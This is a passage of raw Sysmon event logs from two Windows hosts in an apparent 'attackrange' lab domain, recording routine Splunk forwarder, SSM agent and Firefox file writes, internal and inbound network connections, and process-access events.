Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21BB77B2AEEF9D28E247649C02E53A83,SHA256=32A24786FC5182C5F11B31DB4748555F3566965EA576610405733FECE1B3FC2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051621Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:38.966{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1517586928FE75D4B081F0A28BD21787,SHA256=778D8E1113D3CF7468EA70BDCC48AFF81677A2525866B2A3B29DAD994535EF26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980051Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:38.477{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=23B2BF4C15DC401E9CBB1CB4FC3AD045,SHA256=B100C8EBB8D89496F01E7D14BA3AEF7F03BD61EEB36B624D5AF5CE0BF4BE08C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980050Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:38.399{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B21EF9E8E3F75E7255772B7143C8A0B4,SHA256=0C22EAFDDE57A7E6AB0AE84F59ADEDF8E345DC1CFD0E8257147D70E50A9AB0D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051620Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:36.839{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53465-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001051619Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:36.442{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53464-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000980049Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:34.206{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52933-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980053Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:39.634{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BD29E9CF088403B174A56839B04D74F,SHA256=CC31AF8D3E1DA6A5304DEB51D0B778B144FF276AD644578C774ADE86F7EA6958,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051623Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:39.948{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4313MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051622Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:39.317{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=38D4EFD624DAD310B1D52C9514637371,SHA256=5240D4FE505B3E1E72DC3CF9B9104B78F864E7D5F8B612937432DE0DFFCF67BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980052Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:35.773{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59453-false10.0.1.12-8000- 23542300x8000000000000000980054Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:40.759{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E73B4AF7C1ABCE2A35DE84373B00763,SHA256=5F09A6D18665DA958564A4E45E6F9F7AC9397E07FB3C790C02D97CE0A968AB18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051625Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:40.945{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4314MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051624Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:40.001{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6A63C3DE947B451070FC65FB2D3318A,SHA256=B3F9B3AB2C6723B8E8FDA9BA8889830FAE33121BBB1D2CC3209A7B5B34D3E45F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980055Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:41.993{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1519FA161C0786439316D01C8FAD9124,SHA256=D58135CEBD2CD59DA86C8B6ED1AC5FC99AB95A2477011F4F7E436F20694AE2EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051632Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:41.811{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=EAE7EA38B8E0818E0F88AAF646684A31,SHA256=95166E88CE0FD9DA0972396F6E484AF66B332A99005FE6D056C78D037EC91323,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051631Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:41.809{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=75715786955D03756A8739D885ED6F8D,SHA256=21F1B40B23884E7B379A4F35CD34A37E981F8BE98E5AEC0EE7E98D3FF5E2919C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051630Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:41.805{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=4DACF30F45B539C0A7F2D47D83636CCF,SHA256=017691019079CC81BE4D514EA52546B87507A88747AA7A8E5D4C8DB0A739D2D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051629Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:41.803{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=CC25F020C4E8B9C7B536BF8625CFA293,SHA256=7AAEFEAAA2001C07DCCE3D4D5BFE3FABCBD785B76DA0A5F3715E24E69EF82BC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051628Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:41.801{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=8DC138AD550943737A56ED7053F2A1D4,SHA256=6C5E408729CBB49DD7BC5FAAB0AB144E1EC03EE876FC75048E88E8138C425B0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051627Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:41.799{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=7D9A219835EFB1041339735D247256C9,SHA256=47ACBF532E836331B7D19C36620187C6807AF74CA8C7F3AF7CD9BDD6C8C2E93B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051626Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:41.222{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E1AFEBBDB54721A36ADBBDD7FCAA9E5,SHA256=D6A018693B68471AEE2AFE41EC7E876C16349578D3973539D9DDBE9F07FB8F99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051633Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:42.228{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B35317D5F688215AD70314BC330E3D53,SHA256=92D2283DE4AD479A82112A0B1B1FDEFA6B064CA91046100F2AB56CD1694324F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051635Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:41.876{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53466-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051634Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:43.234{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65BF871A6C39855A4D753CD5096AE26F,SHA256=03E78A9B29F713687C5F26CD0B7196D394EFF82A0823594D526C7360797E625E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980058Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:40.406{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54327-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980057Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:43.108{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88701085C0FCB0B1797D0039C801A579,SHA256=5EC3F76A65FCDB9758B5E031B364175C7BB7D60F96608DF0AC789A42939FA682,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980056Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:43.108{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8D2F29B087CCCC70C453470A1993EBC,SHA256=303E3B5548A89BBE54EBF3E9AD46F441C9F349400BAC843C9AC32D24DEDA7CB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980059Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:44.110{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1850F1051B81ED4B83E785A98162443,SHA256=E628AE3D831AAD6A681C6FECF89CF69CD637B6A484A640AE12A7B23932CFF7F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051647Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:44.896{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89B8A0502F3E38B5650558C907770703,SHA256=7767A1FC6677876D2252751D4040FA03560D687FCE26C2C40BCEA2C762A5418C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051646Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:44.895{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CC37C9B6AF1FF944255C455E3C4A8D2,SHA256=5FE231B6C4FABCA74C33221B846887699658FA53CC48F4AEBE18A71945D29F2B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051645Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:44.834{5EBD8912-8C38-6151-5D7A-00000000FC01}42365000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051644Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:44.659{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C38-6151-5D7A-00000000FC01}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051643Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:44.654{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051642Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:44.654{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051641Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:44.652{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051640Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:44.652{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051639Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:44.652{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8C38-6151-5D7A-00000000FC01}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051638Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:44.652{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C38-6151-5D7A-00000000FC01}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051637Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:44.626{5EBD8912-8C38-6151-5D7A-00000000FC01}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051636Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:44.239{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=660BCF8DE1F04420F2C328A2711C1A63,SHA256=B950B836B59CC4720F2624B7DCEBB5A0BE70824F5756E3A9FD57B85163BEF3A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980061Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:41.762{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59454-false10.0.1.12-8000- 23542300x8000000000000000980060Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:45.124{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD06D0C574913873677A961D1F8E30A9,SHA256=C339D3FBC3824CB7E2279F69366EEBCF99A9747F2A2C59FF81FF419850752E9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051665Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.982{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C39-6151-5F7A-00000000FC01}5812C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051664Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.980{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 